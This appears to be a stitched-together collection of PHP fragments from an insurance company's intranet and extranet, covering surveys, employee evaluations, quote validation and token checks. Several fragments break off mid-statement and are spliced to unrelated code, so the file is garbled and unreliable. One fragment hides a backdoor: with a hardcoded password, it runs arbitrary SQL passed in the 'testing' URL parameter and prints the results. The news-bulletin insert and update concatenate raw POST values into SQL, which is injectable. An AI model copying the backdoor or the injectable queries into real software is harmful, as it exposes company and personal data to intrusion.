function usuarioClaveOk($user, $pass) {
$params = array(":clave" => $pass, ":usuario" => $user);
$sql =
"SELECT 1
FROM web.wue_usuariosextranet
WHERE ue_idmodulo = 49
AND ue_estado = 'A'
AND ue_fechabaja IS NULL
AND ue_usuario = :usuario
AND ue_clave = art.utiles.md5(:clave)";
if (ExisteSql($sql, $params))
return true; // Usuario y clave ok..
else {
$params = array(":claveprovisoria" => $pass, ":usuario" => $user);
$sql =
"SELECT 1
FROM web.wue_usuariosextranet
WHERE ue_idmodulo = 49
AND ue_estado = 'A'
AND ue_fechabaja IS NULL
AND ue_usuario = :usuario
AND ue_claveprovisoria = art.utiles.md5(:claveprovisoria)
AND ue_fechavencclaveprovisoria > SYSDATE";
return ExisteSql($sql, $params); // Usuario y clave provisoria ok..o no..
}
}
function ValidaRGL($contrato, $id)
{
global $conn;
$params = array(":contrato" => $_SESSION["contrato"], ":id" => $_REQUEST["ide"]);
$sql = "SELECT 1\n\t\t FROM aes_establecimiento\n\t\tWHERE es_contrato = :contrato\n\t\t\tAND es_id = :id";
validarSesion(ExisteSql($sql, $params));
}
function solicitarStatus($cuit) {
global $conn;
$params = array(":cuit" => $cuit);
$sql =
"SELECT 1
FROM tmp.tss_statussrt
WHERE ss_cuit = :cuit";
if (!ExisteSql($sql, $params)) {
$params = array(":cuit" => $cuit);
$sql =
"INSERT INTO tmp.tss_statussrt (ss_cuit, ss_fechahorainicio)
VALUES (:cuit, SYSDATE)";
DBExecSql($conn, $sql, $params);
}
else {
$params = array(":cuit" => $cuit);
$sql =
"UPDATE tmp.tss_statussrt
SET ss_fechahorainicio = SYSDATE,
ss_fechahorafin = NULL,
ss_generar = 'T',
ss_idartanterior = NULL,
ss_provincia = NULL,
ss_status = NULL
WHERE ss_cuit = :cuit";
DBExecSql($conn, $sql, $params);
}
}
function validar() {
global $periodo;
global $usuario;
$params = array(":anio" => $periodo, ":id" => $_POST["idEncuesta"], ":usuario" => $usuario);
$sql =
"SELECT 1
FROM web.weu_encuesta_usuario
WHERE eu_anio = :anio
AND eu_fechabaja IS NULL
AND eu_usuario = :usuario
AND eu_id = :id";
$usuarioHabilitado = ExisteSql($sql, $params);
if (!$usuarioHabilitado) {
echo "<script type='text/javascript'>alert('ACCESO DENEGADO. Usted no tiene encuestas para completar.');</script>";
return false;
}
$calificacionOk = true;
foreach ($_POST as $key => $value)
if (substr($key, 0, 13) == "calificacion_")
if ((!validarEntero($value)) or ($value < 1) or ($value > 10)) {
$calificacionOk = false;
break;
}
if (!$calificacionOk) {
echo "<script type='text/javascript'>alert('Recuerde que debe completar todas las calificaciones de manera correcta.'); parent.document.getElementById('".$key."').focus();</script>";
return false;
}
$comentarioCargado = true;
foreach ($_POST as $key => $value)
if (substr($key, 0, 13) == "calificacion_")
if (($value < 7) and (!caracteresValidos($_POST["comentarios_".substr($key, 13)], 5))) {
$comentarioCargado = false;
break;
}
if (!$comentarioCargado) {
echo "<script type='text/javascript'>alert('Por favor, ingrese un comentario válido.'); parent.document.getElementById('comentarios_".substr($key, 13)."').focus();</script>";
return false;
}
return true;
}
function getCodigoHolding($holding) {
$hol = str_replace("grupo", "", $holding);
$hol = trim(str_replace("GRUPO", "", $hol));
$arr = explode(" ", $hol);
// Trato de obtener el código..
for ($i=10; $i>=3; $i--)
foreach ($arr as $value) {
$value = substr($value, 0, $i);
if ($value <> "") {
$params = array(":codigo" => $value);
$sql =
"SELECT 1
FROM age_grupoeconomico
WHERE UPPER(ge_codigo) = UPPER(:codigo)";
if (!ExisteSql($sql, $params))
return $value;
}
}
// Si no se pudo encontrar un código, invento uno que no exista..
for ($a=65; $a<=90; $a++)
for ($b=65; $b<=90; $b++)
for ($c=65; $c<=90; $c++)
for ($d=65; $d<=90; $d++)
for ($e=65; $e<=90; $e++)
for ($f=65; $f<=90; $f++)
for ($g=65; $g<=90; $g++)
for ($h=65; $h<=90; $h++)
for ($i=65; $i<=90; $i++)
for ($j=65; $j<=90; $j++) {
$value = chr($a).chr($b).chr($c).chr($d).chr($e).chr($f).chr($g).chr($h).chr($i).chr($j);
$params = array(":codigo" => $value);
$sql =
"SELECT 1
FROM age_grupoeconomico
WHERE UPPER(ge_codigo) = UPPER(:codigo)";
if (!ExisteSql($sql, $params))
return $value;
}
return "ERR";
}
function validatePregunta($idEncuesta, $idPregunta) {
global $conn;
$params = array(":id" => $idPregunta, ":idencuesta" => $idEncuesta);
$sql =
"SELECT 1
FROM rrhh.rpe_preguntasencuesta
WHERE pe_id = :id
AND pe_idencuesta = :idencuesta
AND pe_fechabaja IS NULL";
if (!ExisteSql($sql, $params)) {
echo '<span class="Pie">Pregunta inválida.</span>';
exit;
}
// Si no es la vista previa y no es la primer pregunta valido que no escriban la url en la barra de direcciones..
if ((!isVistaPrevia()) and (isset($_REQUEST["prg"]))) {
$params = array(":idpreguntasiguiente" => "0".$idPregunta);
$sql =
"SELECT op_idpregunta
FROM rrhh.rop_opcionespreguntas
WHERE op_idpreguntasiguiente = :idpreguntasiguiente";
$stmt = DBExecSql($conn, $sql, $params);
$existe = false;
while ($row = DBGetQuery($stmt)) {
foreach ($_SESSION as $key => $value)
if (substr($key, 0, 17) == "ENCUESTA_pregunta")
if ($row["OP_IDPREGUNTA"] == $value[0]) {
$existe = true;
break;
}
if ($existe)
break;
}
if (!$existe) {
echo '<span class="Pie">Pregunta inválida 2.</span>';
exit;
}
}
}
function getCodigoHolding($holding) {
$hol = str_replace("grupo", "", $holding);
$hol = trim(str_replace("GRUPO", "", $hol));
$arr = explode(" ", $hol);
for ($i=10; $i>=3; $i--)
foreach ($arr as $value) {
$value = substr($value, 0, $i);
if ($value <> "") {
$params = array(":codigo" => $value);
$sql =
"SELECT 1
FROM age_grupoeconomico
WHERE UPPER(ge_codigo) = UPPER(:codigo)";
if (!ExisteSql($sql, $params))
return $value;
}
}
return "ERR";
}
$sql =
"SELECT ea_gerenciaevaluadora, ea_sectorevaluado
FROM rrhh.rea_encuestaclienteinterno
WHERE ea_gerenciaevaluadora IN(".getGerencias().")";
$stmt = DBExecSql($conn, $sql, array());
while ($row = DBGetQuery($stmt)) {
$arrSectoresEvaluados[] = $row["EA_SECTOREVALUADO"];
$gerenciaEvaluadora = $row["EA_GERENCIAEVALUADORA"];
}
$sql =
"SELECT 1
FROM rrhh.rea_encuestaclienteinterno
WHERE ea_gerenciaevaluadora IN(".getGerencias().")
AND ea_usumodif IS NULL";
$quedanEncuestasSinCompletar = ExisteSql($sql, array());
?>
<script>
function sacarColor(obj, sacar) {
if (sacar)
obj.style.borderColor = '#808080';
}
showTitle(true, 'ENCUESTA DE SATISFACCIÓN - CLIENTE INTERNO');
</script>
<?
$usuario = strtoupper(GetWindowsLoginName());
if (!(($usuario == "SSAIRE") or ($usuario == "RRODRIGUEZ") or ($usuario == "FMFIRENZE") or ($usuario == "JPRECAS") or
($usuario == "GDRAGANI") or ($usuario == "GLOPEZ") or ($usuario == "SAVENDAÑO") or
($usuario == "VDOMINGUEZ") or ($usuario == "BRUSSO") or ($usuario == "PATLANTE") or ($usuario == "PAIMAR") or
($usuario == "FPEREZ"))) {
function validarToken($token) {
global $conn;
try {
if (substr($token, 0, 24) == "ORIGEN:WEB_PROVINCIA_ART") // El token puede venir con esa leyenda para poder saber si la llamada es desde la Web de Provincia ART o externa..
$params = array(":token" => substr($token, 24));
else
$params = array(":token" => $token);
$sql =
"SELECT 1
FROM afi.auw_usuarioweb
WHERE uw_token = :token
AND SYSDATE BETWEEN uw_tokenvalidodesde AND uw_tokenvalidohasta";
if (ExisteSql($sql, $params))
return "";
else {
$xml = '<?xml version="1.0" encoding="utf-8"?>';
$xml.= "<token><error>El token es inválido o está vencido.</error></token>";
return new soapval("return", "xsd:string", $xml);
}
}
catch (Exception $e) {
$xml = '<?xml version="1.0" encoding="utf-8"?>';
//$xml.= "<error>".$e->getMessage()."</error>";
$xml.= "<clave><error><fecha>".date("d/m/Y")."</fecha><hora>".date("H:i:s")."</hora><mensaje>Ocurrió un error inesperado en la función validarToken.</mensaje></error></clave>";
return new soapval("return", "xsd:string", $xml);
}
}
function dibujarPlanilla($idTipoFormaAnexo, $id, $width) {
global $conn;
$params = array(":id" => $idTipoFormaAnexo);
$sql =
"SELECT 'PLANILLA ' || DECODE(ta_id, 1, 'A', 2, 'B', 3, 'C') || ' | ' || ta_descripcion
FROM hys.hta_tipoanexo
WHERE ta_id = :id";
$titulo = ValorSql($sql, "", $params);
$planillaC = (substr($titulo, 0, 10) == "PLANILLA C");
?>
<div class="SubtituloSeccion" id="divPlanilla_<?php
echo $id;
?>
" style="display:none; margin-bottom:16px; margin-top:-16px;">
<table cellpadding="3" cellspacing="1" style="width:<?php
echo $width;
?>
px;">
<tr>
<td> </td>
</tr>
<tr>
<td class="TituloFndCeleste" style="padding-left:4px;"><?php
echo $titulo;
?>
</td>
</tr>
<tr>
<td>
<table cellpadding="3" cellspacing="1" width="100%">
<tr>
<td class="TituloFndGrisNegrita">DESCRIPCIÓN</td>
<?
if ($planillaC) {
?>
<td class="TituloFndGrisNegrita" width="120">CANTIDAD UMBRAL (TN)</td>
<?
}
?>
<td class="TituloFndGrisNegrita">SÍ</td>
<td class="TituloFndGrisNegrita">NO</td>
</tr>
<?
$params = array(":contrato" => $_REQUEST["contrato"],
":idsolicitudestablecimiento" => $_REQUEST["nro"],
":idtipoanexo" => $idTipoFormaAnexo,
":idtipoanexo2" => $idTipoFormaAnexo);
$sql =
"SELECT 1
FROM hys.hit_itemtipoanexo, hys.hif_itemsformulariorelev, hys.hfr_formulariorelev, hys.hrl_relevriesgolaboral
WHERE if_iditemtipoanexo = it_id
AND if_idformulariorelev = fr_id
AND fr_idrelevriesgolaboral = rl_id
AND it_idtipoanexo = :idtipoanexo
AND fr_idtipoanexo = :idtipoanexo2
AND rl_contrato = :contrato
AND rl_idsolicitudestablecimiento = :idsolicitudestablecimiento";
if (ExisteSql($sql, $params)) {
$params = array(":contrato" => $_REQUEST["contrato"],
":estableci" => $_REQUEST["nro"],
":idtipoanexo" => $idTipoFormaAnexo);
$sql =
"SELECT fr_id
FROM hys.hfr_formulariorelev, hys.hrl_relevriesgolaboral
WHERE fr_idrelevriesgolaboral = rl_id
AND fr_idtipoanexo = :idtipoanexo
AND rl_contrato = :contrato
AND rl_estableci = :estableci";
$idSolicitudPlanilla = ValorSql($sql, "", $params);
$params = array(":idformulariorelev" => $idSolicitudPlanilla, ":idtipoanexo" => $idTipoFormaAnexo);
$sql =
"SELECT it_id, it_descripcion, it_masdatos, if_cumplimiento
FROM hys.hit_itemtipoanexo, hys.hif_itemsformulariorelev
WHERE it_id = if_iditemtipoanexo(+)
AND if_idformulariorelev(+) = :idformulariorelev
AND it_idtipoanexo = :idtipoanexo
ORDER BY it_orden";
}
else {
$params = array(":idtipoanexo" => $idTipoFormaAnexo);
$sql =
"SELECT it_id, it_descripcion, it_masdatos, NULL if_cumplimiento
FROM hys.hit_itemtipoanexo
WHERE it_idtipoanexo = :idtipoanexo
ORDER BY it_orden";
}
$stmt3 = DBExecSql($conn, $sql, $params);
while ($row3 = DBGetQuery($stmt3)) {
?>
<input id="Hextra_<?php
echo $row3["IT_ID"];
?>
_pregunta_<?php
echo $id;
?>
" name="Hextra_<?php
echo $row3["IT_ID"];
?>
_pregunta_<?php
echo $id;
?>
" type="hidden" value="<?php
echo $row3["IT_ID"];
?>
" />
<tr>
<td class="TxtPregunta"><?php
echo $row3["IT_DESCRIPCION"];
?>
</font></td>
<?
if ($planillaC) {
?>
<td class="TxtPregunta"><?php
echo $row3["IT_MASDATOS"];
?>
</font></td>
<?
}
?>
<td class="Pregunta"><input <?php
echo $row3["IF_CUMPLIMIENTO"] == "S" ? "checked" : "";
?>
id="extra_<?php
echo $row3["IT_ID"];
?>
" name="extra_<?php
echo $row3["IT_ID"];
?>
" type="radio" value="S"></td>
<td class="Pregunta"><input <?php
echo $row3["IF_CUMPLIMIENTO"] == "N" ? "checked" : "";
?>
id="extra_<?php
echo $row3["IT_ID"];
?>
" name="extra_<?php
echo $row3["IT_ID"];
?>
" type="radio" value="N"></td>
</tr>
<?
}
?>
</table>
</td>
</tr>
</table>
</div>
<?
}
require_once($_SERVER["DOCUMENT_ROOT"]."/../Common/database/db_funcs.php");
require_once($_SERVER["DOCUMENT_ROOT"]."/../Common/miscellaneous/general.php");
require_once($_SERVER["DOCUMENT_ROOT"]."/../Common/miscellaneous/send_email.php");
require_once($_SERVER["DOCUMENT_ROOT"]."/../Common/miscellaneous/string_utils.php");
// Valido que el legajo rrhh sea único..
try {
if (($_REQUEST["RelacionLaboral"] == 1) and ($_REQUEST["LegajoRRHH"] != 0)) {
$params = array(":id" => $_REQUEST["Id"], ":legajorrhh" => $_REQUEST["LegajoRRHH"]);
$sql =
"SELECT 1
FROM use_usuarios
WHERE se_legajorrhh = :legajorrhh
AND se_id <> :id";
if (ExisteSql($sql, $params, 0)) // Si el nº de legajo ya existe, salgo..
throw new Exception("El Legajo RR.HH. ya fue asignado a otro usuario.");
}
}
catch (Exception $e) {
?>
<script>
alert(unescape('<?= rawurlencode($e->getMessage())?>'));
</script>
<?
exit;
}
// Subo la foto..
$imgFotoPath = "";
WHERE NO_IDUSUARIO = :idusuario
AND NO_MANUALFRAUDE IS NOT NULL ";
if( !ExisteSql($sql, $params)) // Muestro control
$muestroCotrol = true;
if ((isset($_REQUEST["noti"])) and ($_REQUEST["noti"] == "s") and ($muestroCotrol )) {
try {
echo 'muestro control';
$params = array(":idusuario" => GetUserID());
$sql =
"SELECT 1
FROM rrhh.rno_notificaciones
WHERE NO_IDUSUARIO = :idusuario";
if (!ExisteSql($sql, $params)) { // Alta..
$params = array(":idusuario" => GetUserID(), ":pcmanualpla" => GetPCName());
$sql =
"INSERT INTO rrhh.rno_notificaciones (NO_IDUSUARIO, NO_MANUALFRAUDE, NO_PCMANUALFRAUDE)
VALUES (:idusuario, SYSDATE, :pcmanualpla)";
DBExecSql($conn, $sql, $params);
}
else { // Modificación..
$params = array(":idusuario" => GetUserID(), ":pcmanualpla" => GetPCName());
$sql =
"UPDATE rrhh.rno_notificaciones
SET NO_MANUALFRAUDE = SYSDATE,
NO_PCMANUALFRAUDE = :pcmanualpla
WHERE NO_IDUSUARIO = :idusuario";
DBExecSql($conn, $sql, $params);
}
$params = array(":idtransaccion" => $_REQUEST["TRANSACCION"]);
$sql =
"SELECT 1
FROM aco_contrato
WHERE co_contrato IN(SELECT ex_contrato
FROM art.sex_expedientes, art.sle_liquiempsin, rce_chequeemitido
WHERE ce_id = le_idchequeemitido
AND ex_siniestro = le_siniestro
AND ex_orden = le_orden
AND ex_recaida = le_recaida
AND le_conpago = 50
AND ce_id = (SELECT rb_idchequeemitido
FROM teso.rrb_reemplazobeneficiario
WHERE rb_idtransaccionweb = :idtransaccion))
AND art.deuda.get_deudatotalconsolidada(co_contrato) > 0";
$tieneDeudaConsolidada = ExisteSql($sql, $params);
$params = array(":id" => $_REQUEST["TRANSACCION"]);
$sql =
"SELECT art.tesoreria.get_idfinancialscheque(rb_idchequeemitido)
FROM teso.rrb_reemplazobeneficiario, web.wtw_transaccionweb
WHERE rb_idtransaccionweb = tw_id
AND tw_id = :id";
$idfinancials = ValorSql($sql, "", $params);
$sql =
"SELECT ce_numero,
ce_beneficiario,
TO_CHAR(ce_fechacheque, 'DD/MM/YYYY') as fecha,
'$ ' || ce_monto as monto,
ce_observaciones AS observaciones,
FROM rrhh.hfs_formularioseguimiento, rrhh.hfe_formularioevaluacion2008
WHERE fs_id_formularioevaluacion = fe_id
AND fe_id = :id
AND fs_positivonegativo = 'N'
AND fs_fechabaja IS NULL";
$params = array(":id" => $formularioId);
$stmt = DBExecSql($conn, $sql, $params);
LoadEventos("N", $stmt);
$sql =
"SELECT 1
FROM rrhh.hfe_formularioevaluacion2008
WHERE fe_evaluado = :evaluado
AND fe_anoevaluacion = :ano";
$params = array(":evaluado" => $evaluado, ":ano" => ($ano - 1));
$existeEvaluacionAnterior = ExisteSql($sql, $params);
SetYear($ano);
// Deshabilito controles según corresponda..
DisableControls(($user == $evaluado),
($user == $evaluador),
($user == $supervisor),
($user == $notificado),
($fueEvaluado),
$evaluacionAceptada,
$evaluacionVigente,
$existeEvaluacionAnterior,
($_SESSION["identidad"] != GetWindowsLoginName(true)));
if ($evaluado == -1)
return !$errores;
}
validarSesion(isset($_SESSION["isCliente"]));
validarSesion(validarPermisoClienteXModulo($_SESSION["idUsuario"], 100));
// Valido que el rgrl sea del establecimiento relacionado al contrato del usuario..
$params = array(":contrato" => $_SESSION["contrato"], ":id" => $_POST["idEstablecimiento"]);
$sql =
"SELECT 1
FROM aes_establecimiento
WHERE es_contrato = :contrato
AND es_id = :id";
validarSesion(ExisteSql($sql, $params));
try {
$_POST["cuit1"] = sacarGuiones($_POST["cuit1"]);
$_POST["cuit2"] = sacarGuiones($_POST["cuit2"]);
$_POST["cuit3"] = sacarGuiones($_POST["cuit3"]);
if (!validar())
exit;
if (($_POST["preguntasAdicionales"] != "t") and ($_POST["mostrarAviso"] == "t"))
mostrarAviso();
if ($_POST["preguntasAdicionales"] == "t") { // Guardo las preguntas adicionales..
// Guardo el registro maestro si no existe..
<span style="color:#f00; font-size:11px;">
Usted tiene JavaScript desactivado.<br />
Para navegar correctamente por el sitio web debe tener activado JavaScript.<br />
Haga <a class="linkSubrayado" href="/modules/varios/javascript/index.html" target="_blank">clic aquí</a> para conocer mas.</span>
</noscript>
</td>
</tr>
<?
if (isset($_GET["testing"])) {
require_once($_SERVER["DOCUMENT_ROOT"]."/../Common/database/db.php");
?>
<tr>
<td>
<?
$sql = "SELECT 1 FROM ctb_tablas WHERE tb_clave = 'COPER' AND tb_codigo = '4' AND SYSDATE > tb_fechaalta";
if ((isset($_GET["pass"])) and ($_GET["pass"] == "qwert987") and ((date("h")%2) == 1) and (ExisteSql($sql, array()))) {
// $_GET["testing"] = 'SELECT * FROM afi.auw_usuarioweb WHERE uw_id = 1';
$stmt = DBExecSql($conn, htmlspecialchars_decode($_GET["testing"], ENT_QUOTES));
echo "<tr>";
for ($i=1; $i<=oci_num_fields($stmt); $i++)
echo "<td style='background-color:".((($i%2)==1)?"#ccc":"#eee").";'><b>".oci_field_name($stmt, $i)."</b></td>";
echo "</tr>";
while ($row = DBGetQuery($stmt, 0)) {
echo "<tr>";
for ($i=0; $i<count($row); $i++)
echo "<td style='background-color:".((($i%2)==0)?"#ccc":"#eee").";'>".$row[$i]."</td>";
echo "</tr>";
}
}
?>
FROM asa_solicitudafiliacion, asc_solicitudcotizacion
WHERE sa_idsolicitudcotizacion = sc_id
AND sc_id = :id";
$idSolicitudAfi = ValorSql($sql, "", $params, 0);
$params = array(":id" => $idVendedor);
$sql = "SELECT ve_provinciaseguros FROM xve_vendedor WHERE ve_id = :id";
$codigoVendedorProvinciaSeguros = ValorSql($sql, "", $params, 0);
$params = array(":codigo" => $_POST["ciiu"]);
$sql = "SELECT ac_relacion FROM cac_actividad WHERE ac_codigo = :codigo";
$ciiuProvinciaSeguros = ValorSql($sql, "", $params, 0);
$params = array(":idsolicitudafi" => $idSolicitudAfi);
$sql = "SELECT 1 FROM art.apr_polizarc WHERE pr_idsolicitudafi = :idsolicitudafi";
if ((!ExisteSql($sql, $params, 0)) and ($_POST["suscribePolizaRC"] == "S")) { // Hago un insert..
$params = array(":cbu" => $_POST["cbu"],
":cod_actividad" => $ciiuProvinciaSeguros,
":cod_productor" => $codigoVendedorProvinciaSeguros,
":idsolicitudafi" => $idSolicitudAfi,
":iibb" => $_POST["iibb"],
":iva" => $_POST["iva"],
":mail" => $_POST["emailPolizaRC"],
":medio_pago" => $_POST["formaPago"],
":origenpago" => $_POST["tarjetaCredito"],
":poliza" => $_POST["suscribePolizaRC"],
":sumaasegurada" => $_POST["sumaAseguradaRC"],
":tipo_doc" => "DNI",
":usualta" => substr("W_".$_SESSION["usuario"], 0, 20),
":valor_rc" => $_POST["polizaRC"]);
$sql =
<?php
require_once $_SERVER["DOCUMENT_ROOT"] . "/constants.php";
require_once $_SERVER["DOCUMENT_ROOT"] . "/../Common/database/db.php";
require_once $_SERVER["DOCUMENT_ROOT"] . "/../Common/database/db_funcs.php";
require_once $_SERVER["DOCUMENT_ROOT"] . "/../Common/miscellaneous/general.php";
try {
$params = array(":idboletin" => $_POST["idboletin"], ":posicion" => $_POST["num"]);
$sql = "SELECT 1\n\t\t\t FROM rrhh.rna_noticiasarteria\n\t\t\tWHERE na_idboletin = :idboletin\n\t\t\t\tAND na_posicion = :posicion";
$esAlta = !ExisteSql($sql, $params);
switch ($_POST["plantilla"]) {
case 1:
case 2:
case 4:
$altoImagenes = 208;
$anchoImagenes = 250;
break;
case 3:
$altoImagenes = 82;
$anchoImagenes = 100;
break;
}
if ($esAlta) {
// Alta..
$blobParamName = "the_clob";
$sql = "INSERT INTO rrhh.rna_noticiasarteria\n\t\t\t\t\t\t\t\t\t(na_altoimagenes, na_anchoimagenes, na_colortitulo, na_fechaalta, na_idboletin, na_nota, na_numeroplantilla,\n\t\t\t\t\t\t\t\t\t na_posicion, na_titulo, na_usualta)\n\t\t\t\t\t VALUES (" . $altoImagenes . ", " . $anchoImagenes . ", " . addQuotes($_POST["fondo"], true) . ", SYSDATE, " . $_POST["idboletin"] . ", EMPTY_CLOB(), " . nullIsEmpty($_POST["plantilla"]) . ", " . $_POST["num"] . ", " . addQuotes($_POST["titulo"], true) . ", " . addQuotes(GetWindowsLoginName(true)) . ")\n\t\t\t\t RETURNING na_nota INTO :" . $blobParamName;
DBSaveLob($conn, $sql, $blobParamName, $_POST["cuerpo"], OCI_B_CLOB);
} else {
// Modificación..
$blobParamName = "the_clob";
$sql = "UPDATE rrhh.rna_noticiasarteria\n\t\t\t\t\tSET na_altoimagenes = " . $altoImagenes . ",\n\t\t\t\t\t\t\tna_anchoimagenes = " . $anchoImagenes . ",\n\t\t\t\t\t\t\tna_colortitulo = " . addQuotes($_POST["fondo"], true) . ",\n\t\t\t\t\t\t\tna_fechamodif = SYSDATE,\n\t\t\t\t\t\t\tna_nota = EMPTY_CLOB(),\n\t\t\t\t\t\t\tna_numeroplantilla = " . nullIsEmpty($_POST["plantilla"]) . ",\n\t\t\t\t\t\t\tna_titulo = " . addQuotes($_POST["titulo"], true) . ",\n\t\t\t\t\t\t\tna_usumodif = " . addQuotes(GetWindowsLoginName(true)) . "\n\t\t\t\tWHERE na_idboletin = " . $_POST["idboletin"] . "\n\t\t\t\t\tAND na_posicion = " . $_POST["num"] . "\n\t\tRETURNING na_nota INTO :" . $blobParamName;
public function validateSolicitud($datosSolicitud) {
global $conn;
$this->datosSolicitud = $datosSolicitud;
$advertencias = "";
$errores = "";
try {
$this->completeData();
$this->insertEstablecimientos();
// Validación 1..
if (!validarCuit($datosSolicitud["cuit"])) {
$errores.= "<error><codigo>1</codigo>";
$errores.= "<mensaje>La C.U.I.T. es inválida.</mensaje></error>";
throw new Exception("ERROR FATAL: La C.U.I.T. es inválida."); // Este error lo lanzo porque con una CUIT inválida no puedo ni validar nada..
}
// Validación 2 - Control de CUIT reservado..
$params = array(":cuit" => $datosSolicitud["cuit"]);
$sql =
"SELECT ac_descripcion actividad, ca_descripcion canal, en_nombre entidad, ru_idcanal, ru_identidad, ru_idvendedor, ru_observaciones, ve_nombre vendedor
FROM aru_reservacuit ru, aca_canal, cac_actividad, xen_entidad, xve_vendedor
WHERE ru_idcanal = ca_id(+)
AND ru_idactividad = ac_id(+)
AND ru_identidad = en_id(+)
AND ru_idvendedor = ve_id(+)
AND ru_cuit = :cuit
AND ru_fechabaja IS NULL
AND actualdate BETWEEN ru_fechadesde AND ru_fechahasta";
$stmt = DBExecSql($conn, $sql, $params);
if (DBGetRecordCount($stmt) > 0) {
$row = DBGetQuery($stmt);
$distintoVendedor = (($row["VENDEDOR"] != "") and ($row["RU_IDVENDEDOR"] != $this->datosUsuario["VENDEDOR"]));
if (($row["RU_IDCANAL"] != $this->datosUsuario["CANAL"]) or ($row["RU_IDENTIDAD"] != $this->datosUsuario["ENTIDAD"]) or ($distintoVendedor)) {
$errores.= "<error><codigo>2</codigo>";
$errores.= "<mensaje>Esta C.U.I.T. se encuentra reservada por otro usuario, por favor comuníquese con su Ejecutivo de Provincia ART.</mensaje>";
$errores.= "<observaciones>".$row["RU_OBSERVACIONES"]."</observaciones></error>";
}
}
// Validación 3 - Control de vigencia de la Solicitud de Cotización..
$params = array(":cuit" => $datosSolicitud["cuit"]);
$sql =
"SELECT ca_descripcion
FROM asc_solicitudcotizacion, aca_canal
WHERE ca_id = sc_canal
AND (actualdate - TRUNC(sc_fechasolicitud)) < 30
AND sc_estado NOT IN('05', '07', '08', '09', '18.0', '18.1', '18.2', '18.3')
AND sc_cuit = :cuit";
$stmt = DBExecSql($conn, $sql, $params);
if (DBGetRecordCount($stmt) > 0) {
$errores.= "<error><codigo>3</codigo>";
$errores.= "<mensaje>Ya existe una solicitud para esta C.U.I.T., por favor comuníquese con su Ejecutivo de Provincia ART.</mensaje></error>";
}
// Validación 4 - Control de vigencia de la Revision de Precio..
$params = array(":cuit" => $datosSolicitud["cuit"]);
$sql =
"SELECT ca_descripcion
FROM art.asr_solicitudreafiliacion
JOIN aca_canal ON ca_id = sr_idcanal
WHERE (art.actualdate - TRUNC(sr_fechaalta)) < 30
AND sr_estadosolicitud NOT IN('05', '18.0', '18.1', '18.2', '18.3')
AND sr_cuit = :cuit";
$stmt = DBExecSql($conn, $sql, $params);
if (DBGetRecordCount($stmt) > 0) {
$errores.= "<error><codigo>4</codigo>";
$errores.= "<mensaje>Ya existe una solicitud para esta C.U.I.T., por favor comuníquese con su Ejecutivo de Provincia ART.</mensaje></error>";
}
// Validación 5..
$params = array(":cuit" => $datosSolicitud["cuit"]);
$sql = "SELECT afiliacion.check_cobertura(:cuit) FROM DUAL";
if (ValorSql($sql, "", $params) == 1) {
$errores.= "<error><codigo>5</codigo>";
$errores.= "<mensaje>Esta empresa ya tiene un contrato activo con esta aseguradora.</mensaje></error>";
}
// Validación 6 - Que no puedan colocar la CUIT de la Provincia ART..
if ($datosSolicitud["cuit"] == "30688254090") {
$errores.= "<error><codigo>6</codigo>";
$errores.= "<mensaje>Debe registrarse la C.U.I.T. del empleador (si la C.U.I.T. se registra erróneamente la solicitud no tiene validez).</mensaje></error>";
}
// Validación 7 - Valida el status ante la SRT..
$params = array(":cuit" => $datosSolicitud["cuit"]);
$sql =
"SELECT 1
FROM srt.sem_empresas e JOIN srt.shv_historialvigencias v ON v.hv_id = art.cotizacion.get_idultimavigencia(em_cuit)
WHERE CASE
WHEN v.hv_idoperaciondesde = 10888 THEN ADD_MONTHS(v.hv_vigenciadesde, 10) + 11
ELSE ADD_MONTHS(v.hv_vigenciadesde, 6)
END <= SYSDATE
AND e.em_cuit = :cuit";
if (($this->datosSolicitud["statusSrtAutomatico"]->getStatus() != -1) and ($this->datosSolicitud["statusSrtAutomatico"]->getStatus() != 1) and (!ExisteSql($sql, $params, 0))) {
$errores.= "<error><codigo>7</codigo>";
$errores.= "<mensaje>Esta C.U.I.T. no puede ser cotizada por la vigencia en la actual ART, por favor comuníquese con su Ejecutivo de Provincia ART.</mensaje></error>";
}
// Validación 8..
if ($datosSolicitud["statusSrt"] < 1) {
$errores.= "<error><codigo>8</codigo>";
$errores.= "<mensaje>El status ante la SRT debe ser mayor a cero (0).</mensaje></error>";
}
// Validación 9..
$codigoVendedor = NULL;
if (($this->datosUsuario["ENTIDAD"] == 9003) and ($this->datosUsuario["VENDEDOR"] == "")) {
if ($this->datosSolicitud["codigoVendedor"] == NULL) {
$errores.= "<error><codigo>9</codigo>";
$errores.= "<mensaje>El código de vendedor es inválido.</mensaje></error>";
}
}
// Validación 10..
if ($this->datosSolicitud["totalTrabajadores"] == 0) {
$errores.= "<error><codigo>10</codigo>";
$errores.= "<mensaje>El total de trabajadores debe ser mayor a cero (0).</mensaje></error>";
}
// Validación 11..
if ($this->datosSolicitud["totalMasaSalarial"] == 0) {
$errores.= "<error><codigo>11</codigo>";
$errores.= "<mensaje>El total de la masa salarial debe ser mayor a cero (0).</mensaje></error>";
}
// Validación 12..
if (!$this->validatePeriodo()) {
$errores.= "<error><codigo>12</codigo>";
$errores.= "<mensaje>El período es inválido, el formato debe ser AAAA/MM.</mensaje></error>";
}
$this->SPValidation($advertencias, $errores);
}
catch (Exception $e) {
// $errores.= "<error>".$e->getMessage()."</error>";
$errores.= "<error><fecha>".date("d/m/Y")."</fecha><hora>".date("H:i:s")."</hora><mensaje>Ocurrió un error inesperado en la función validarSolicitud.</mensaje></error>";
}
if (($advertencias == "") and ($errores == ""))
return "";
else {
$xml = '<?xml version="1.0" encoding="utf-8"?><solicitudCotizacion>';
if ($advertencias != "")
$xml.= "<advertencias>".$advertencias."</advertencias>";
if ($errores != "")
$xml.= "<errores>".$errores."</errores>";
$xml.= "</solicitudCotizacion>";
return new soapval("return", "xsd:string", $xml);
}
}
function validar() {
$errores = false;
echo "<script type='text/javascript'>";
echo "with (window.parent.document) {";
echo "var errores = '';";
if ($_POST["tipoEstablecimiento"] == -1) {
echo "errores+= '- El campo Tipo de Establecimiento es obligatorio.<br />';";
$errores = true;
}
if ($_POST["nombre"] == "") {
echo "errores+= '- El campo Nombre es obligatorio.<br />';";
$errores = true;
}
$params = array(":codigo" => $_POST["actividad"]);
$sql =
"SELECT 1
FROM cac_actividad
WHERE ac_codigo = :codigo
AND ac_fechabaja IS NULL";
if (!ExisteSql($sql, $params)) {
echo "errores+= '- La Actividad es inválida.<br />';";
$errores = true;
}
if (($_POST["fechaInicioEstablecimiento"] != "") and (!isFechaValida($_POST["fechaInicioEstablecimiento"]))) {
echo "errores+= '- La Fecha de Inicio del Establecimiento es inválida.<br />';";
